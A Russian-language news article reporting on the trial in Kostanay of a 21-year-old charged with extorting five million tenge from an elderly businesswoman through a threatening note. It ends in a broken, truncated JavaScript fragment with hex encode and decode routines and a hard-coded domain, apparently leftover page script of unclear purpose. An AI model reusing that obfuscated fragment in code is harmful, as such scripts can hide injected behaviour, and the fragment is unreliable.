Домой Новости Дело о вымогательстве пяти миллионов тенге начали рассматривать в костанайском спецсуде

Дело о вымогательстве пяти миллионов тенге начали рассматривать в костанайском спецсуде

881
0

На скамье подсудимых 21-летний молодой человек По его словам, на преступление он пошёл, что бы раздобыть средства на лечение маленького сына, с рождения страдающего заболеваниями нервной системы. Но деньги он решил вытребовать у пожилой женщины-предпринимателя, угрожая уничтожить её имущество и даже расправиться с внуком.

«С вас пять миллионов тенге. В случае несогласия или обращения в правоохранительные органы мы гарантируем, что сгорит ваш автомобиль и дом. Срок передачи денег 12.11.15. … Если вы обратитесь в органы, пострадает ваш внук. Мы не шутим».

Такую записку нашла под очистителем лобового стекла своей машины 69-летняя глава крестьянского хозяйства из Костаная Бахыткуль Журсиналина 12 ноября 2015 года в Затобольске, куда она приехала по делам. Сейчас бумага приобщена в качестве доказательства к материалам уголовного дела, которое начали рассматривать в уголовном суде области. Сама потерпевшая рассказала, что в записке, на тот момент неизвестный злоумышленник указал, где и как оставить деньги.

Женщина, по её словам, поехала в Костанай, по дороге отслеживая нет ли за ней слежки, и через время всё же обратилась в южный отдел полиции Костаная с заявлением об угрозе вымогателей. В тот же день был разработан план операции по захвату злоумышленника. В машину была подложена так называемая денежная кукла — пачка бумаги вырезанной по размеру купюр, с двух сторон прикрытая настоящими деньгами. И в назначенное время к машине подошёл мужчина, и влез в неё. Оперативники выбежали из засады, и, немного погонявшись за убегавшим человеком, задержали его. Таким образом на скамье подсудимых оказался 21-летний Рамиль Сиитов, казах по национальности, но гражданин Российской Федерации, последние годы житель Костаная.

По данным обвинения он сам выбрал семью, с которой решил потребовать деньги, сам разработал план, сам написал записку с угрозами, сам явился за деньгами. Таким образом действия Сеитова квалифицированы как «Вымогательство».

Вину Сиитов признал в полном объёме, и по его словам сильно раскаялся в содеянном.

Однако потерпевшая считает, что Сиитов действовал не один. В одиночку, по её мнению, он не смог бы организовать слежку за автомобилем, которым она управляла. Да и в записке он использовал местоимение «Мы». Впрочем, прямых доказательств действий в данном случае преступной группы нет.

В качестве возмещения морального вреда, женщина требует с подсудимого полмиллиона тенге. В суде начался опрос свидетелей.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "alau.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e